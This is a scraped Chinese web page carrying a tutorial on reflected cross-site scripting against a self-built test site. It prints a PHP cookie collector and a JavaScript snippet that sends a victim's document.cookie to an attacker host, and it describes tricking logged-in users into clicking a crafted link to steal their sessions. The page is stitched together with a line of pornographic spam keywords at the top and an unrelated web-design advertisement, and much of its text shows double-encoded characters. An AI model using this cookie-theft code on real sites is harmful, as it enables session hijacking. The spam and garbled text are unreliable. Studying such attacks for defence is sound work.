日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
反射型xss實戰(zhàn)演示

我們知道,XSS攻擊大致分為三種類型 :Persistent型(持久型),Non-persistent(反射型)及Dom-based型。而反射型是最常用,也是使用得最廣的一種攻擊方式。它通過給別人發(fā)送帶有惡意腳本代碼參數(shù)的URL,當(dāng)URL地址被打開時,特有的惡意代碼參數(shù)被HTML解析、執(zhí)行。它的特點是非持久化,必須用戶點擊帶有特定參數(shù)的鏈接才能引起。

創(chuàng)新互聯(lián)專注于安龍企業(yè)網(wǎng)站建設(shè),響應(yīng)式網(wǎng)站設(shè)計,電子商務(wù)商城網(wǎng)站建設(shè)。安龍網(wǎng)站建設(shè)公司,為安龍等地區(qū)提供建站服務(wù)。全流程定制網(wǎng)站設(shè)計,專業(yè)設(shè)計,全程項目跟蹤,創(chuàng)新互聯(lián)專業(yè)和態(tài)度為您提供的服務(wù)

今天,通過一個反射型xss的實戰(zhàn)演示,讓大家詳細(xì)了解這種攻擊方式。

準(zhǔn)備工作:

(1) 一個有反射型xss漏洞的網(wǎng)站(自己搭的虛擬站點,域名為xsstest.qq.com),該域名下有一個首頁(index.html),一個登陸頁面(login.html),一個登陸的cgi(login.php),一個用于搜索的cgi(search.php)。界面如下:

由于xss漏洞一般發(fā)生于與用戶交互的地方,因此搜索框是我們關(guān)注的重點。

(2)我們自己的黑客網(wǎng)站(另一個虛擬站點 hacker.qq.com)。該域名下有一個hack.php,用以收集用戶的cookie,一個hacker.js用以向hack.php發(fā)請求。

發(fā)現(xiàn)漏洞

我們首先需要找出站點的xss漏洞發(fā)生在什么地方,上面提到,與用戶交互的地方是我們的主要關(guān)注點。好,現(xiàn)在我們隨意輸入幾個字符“計算機”,點擊搜索:

搜索界面如下(這是自己寫的一個簡陋的搜索界面):

這里發(fā)現(xiàn)了我們輸入的字符出現(xiàn)在了搜索界面上(很多電商網(wǎng)站應(yīng)該都是這種界面頁面形式吧)。好,這次我們輸入一些特殊字符來試試“”,點擊搜索:

出現(xiàn)了我們心儀的小彈窗,看來search.php未對用戶輸入的關(guān)鍵詞作任何處理,便直接輸出到界面上,既然xss漏洞出現(xiàn),那么便可以開始實施攻擊了,這次攻擊的目的是盜取用戶的cookie。

實施攻擊

首先我們來寫我們自己的手機cookie CGI(hack.php),代碼如下:

 
 
 
    
  
  
  
  1. 
  
  
  
  2. $cookie = $_GET['q']; 
    3. 
  
  
  
  3. var_dump($cookie); 
    4. 
  
  
  
  4. $myFile = "cookie.txt"; 
    5. 
  
  
  
  5. file_put_contents($myFile, $cookie); 
    6. 
  
  
  
  6. ?> 
    7.

接著寫發(fā)送請求的hacker.js,代碼如下:

var img = new Image();
img.src = "http://hacker.qq.com/hack.php?q="+document.cookie;
document.body.append(img);

好的,現(xiàn)在可以構(gòu)造一個連接來欺騙用戶了:

點擊就送998

看search.php 后的q參數(shù) ,解碼后為

實際的作用是模擬用戶在搜索框中輸入
后點擊搜索。search.php未經(jīng)處理的將其直接輸入到頁面,使其在html文檔中有了新的語義。它會加載hacker.qq.com域下的haker.js。
好,當(dāng)用戶登陸了網(wǎng)站后,再欺騙用戶點擊這個鏈接,這時候,看hacker.qq.com域下,發(fā)現(xiàn)多了一個cookie.txt文件,打開來:
發(fā)現(xiàn)用戶用于登陸的賬號,密碼都在內(nèi),密碼是經(jīng)過加密的。OK,現(xiàn)在我們便可以拿著這個cookie來獲取用戶的登陸態(tài)了。
整個攻擊過程結(jié)束。
當(dāng)然,現(xiàn)實過程中,很少有網(wǎng)站有如此明顯的xss漏洞。這里只是給大家示范了一下反射型xss的原理,現(xiàn)實中的漏洞雖然五花八門,但是本質(zhì)是不變的。大家可以進(jìn)一步研究。
                                                

                                                新聞名稱:反射型xss實戰(zhàn)演示                                                

                                                網(wǎng)頁路徑:http://www.5511xx.com/article/dpsdege.html